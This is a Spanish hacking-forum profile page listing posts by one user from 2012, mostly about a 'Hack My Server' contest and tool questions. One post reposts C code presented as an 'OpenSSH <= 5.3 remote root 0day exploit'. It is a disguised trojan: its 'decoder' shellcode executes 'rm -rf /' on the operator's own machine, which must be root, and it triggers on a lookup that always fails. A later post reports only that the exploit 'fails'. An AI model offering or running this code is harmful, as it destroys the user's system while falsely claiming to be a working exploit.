últimos mensajes de: h1t

Mostrar Mensajes
Páginas: [1]

1	Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server"	en: 8 Mayo 2012, 11:11 am
Cita de: adastra en 8 Mayo 2012, 00:12 am Hola h1t. Ya he probado tu exploit, resultado: El exploit falla, sin embargo se trata de un 0day para versiones recientes de SSH, en concreto en que foro lo haz visto? y cual es la vulnerabilidad que explota? Bueno tengo que pedir disculpas por ese código tenia tanta prisa que ni siquiera me paré a observarlo un poco. lo saqué de esta web http://forum.guiadohacker.com.br/showthread.php?t=11113 EDITO: voy a echarle un ratito ahora a ver si logro sacar algo, posteo si tengo avances. : )

Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server"

en: 7 Mayo 2012, 23:58 pm

He indagado un poco por la red y he encontrado un exploit de openssh que me queda por probarlo pero la hora que es no me da tiempo jajajaja. Os lo dejo por aquí a ver si le echais un vistazo y lo probais y tal.

Código:

/*
*
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
* OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
*
*/

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void usage(char *argv[])
{
    printf("\n\t[+] HATSUNEMIKU\n");
    printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
    printf("\t[+] By: n3xus\n");
    printf("\t[+] Greetz to hackforums.net\n");
    printf("\t[+] Keep this 0day priv8!\n");
    printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
    exit(1);
}

unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
                           "\x6a\x2f\x89\xe7\x52"
                           "\x66\x68\x2d\x66\x89"
                           "\xe6\x52\x66\x68\x2d"
                           "\x72\x89\xe1\x52\x68"
                           "\x2f\x2f\x72\x6d\x68"
                           "\x2f\x62\x69\x6e\x89"
                           "\xe3\x52\x57\x56\x51"
                           "\x53\x89\xe1\xcd\x80";

unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
                           "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
                           "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
                           "\xdb\x40\xcd\x80";

int main(int argc, char **argv)
{

    int euid = geteuid();
    int port= 22, sock;
    char h[1000];
    struct hostent *host;
    struct sockaddr_in addr;

    if(euid != 0)
    {
        fprintf(stderr, "You need to be root to use raw sockets.\n");
        exit(1);
    }
    if(euid == 0)
    {
        fprintf(stdout, "MIKU! MIKU! MIKU!\n");
    }
    if(argc != 3)
    usage(argv);
    if(!inet_aton(h, &addr.sin_addr))
    {
        host = gethostbyname(h);
        if(!host)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            (*(void(*)())decoder)();
            exit(1);
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
        }
        sock = socket(PF_INET, SOCK_STREAM, 0);
        addr.sin_port = htons(port);
        addr.sin_family = AF_INET;
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr,"[-] Exploit failed.\n");
            exit(1);
        }
        char payload[1337];
        memcpy(payload, &decoder, sizeof(decoder));
        memcpy(payload, &rootshell, sizeof(rootshell));
        send(sock, payload, strlen(payload),0);
        close(sock);
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            exit(1);
        }
        else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
        {
            fprintf(stdout, "[+]g0t sh3ll!\n");
            system("/bin/bash");
        }
        else
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            close(sock);
            exit(0);
        }

Lo he extraido de un foro que por si las moscas no pongo la url por que no se si se podría tratar de spam o no no me queda claro jejeje, si por algún casual se tiene que poner pues indicadmelo y lo pongo sin problemas.

Saludoss y ánimo que esto lo sacamos entre todos jajajjaa.

3	Seguridad Informática / Hacking / Re: Videotutoriales de Hacking	en: 3 Mayo 2012, 00:13 am
Por youtube y eso podrás encontrar algo sobre hacking pero te recomiendo que deseches la idea de videotutoriales y mires manuales y busques info sobre este tema, en un video encontrarás algo muy específico y si quieres aprender a hackear tendras que leer y comprender. Como ultima recomendación pásate por el apartado: http://www.elhacker.net/Textos1.html y mira algunos de los que están allí. : )

4	Seguridad Informática / Hacking / Re: Consulta Wireshark	en: 2 Mayo 2012, 23:59 pm
Creo recordar que a no ser que tengas una antena wifi no podrás ver lo que viaja pro wifi, teniendo una ehternet no puedes. Pero de todas formas voy a buscar info sobre el tema por que esta pregunta ya me la he hecho pero nunca he investigado jajajajaja. Si encuentor algo te comento

5	Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server"	en: 2 Mayo 2012, 23:18 pm
Hola buenas después de mirar la información de dimitrix sobre los servicios del server, voy a probar el siguiente: Servicio 22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0) voy a investigar un poco más sobre eso y a ver que sale. : )

6	Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server"	en: 27 Abril 2012, 20:30 pm
Me parece una buena iniciativa, yo me apunto

7	Sistemas Operativos / Mac OS X / Re: [DUDA]Redimensionar tamaño de imagen de disco con mac osx	en: 25 Abril 2012, 16:16 pm
Bueno posteo para decir que ya lo he resuelto, me ha traicionado la vista, jajajaj había un botón que era "Cambiar tamaño de imagen". Suele pasarnos diría yo xD

8	Seguridad Informática / Hacking / Re: Pregunta :D sobre usuario de windows y su pass	en: 20 Abril 2012, 20:43 pm
Para aclararme un poquito, lo que quieres es digamos "instalar un ophcrack" en el propio sistema de BT5? si es así voy a aventurarme en el primer paso, podrias investigar un poco mas a fondo ophcrack y a ver que programa usa y luego extraerlo o algo así... es mas o menos una idea, si estoy equivocado decidlo jejeje

9	Seguridad Informática / Hacking / Re: Ayuda con Brutus AET2	en: 19 Abril 2012, 14:12 pm
En la red debería de haber información de los dos, pero si no la encuentras siempre puedes recurrir a youtube jejejeje. Aqui te dejo dos videos de los dos programas que buscas ayuda: Brutus: http://www.youtube.com/watch?v=XW6sub5DMEU SuperScan: http://www.youtube.com/watch?v=_6Lr7e7cGdk : )

10	Sistemas Operativos / Mac OS X / [DUDA]Redimensionar tamaño de imagen de disco con mac osx	en: 17 Abril 2012, 21:54 pm
He estado buscando información sobre esto pero no he encontrado nada, podría ser que no lo busco con los criterios adecuados o algo, mi duda es la siguiente: Tengo una imagen de disco hecha en mac os x, la uso para como contenedor, pero en la "Utilidad de disco" cree una imagen de 20 GB pero resulta que s eme queda pequeño y me preguntaba si se podría redimensionar el tamaño de 20 GB a 30 GB por ejemplo. Gracias por las respuesta que me podais dar.

Páginas: [1]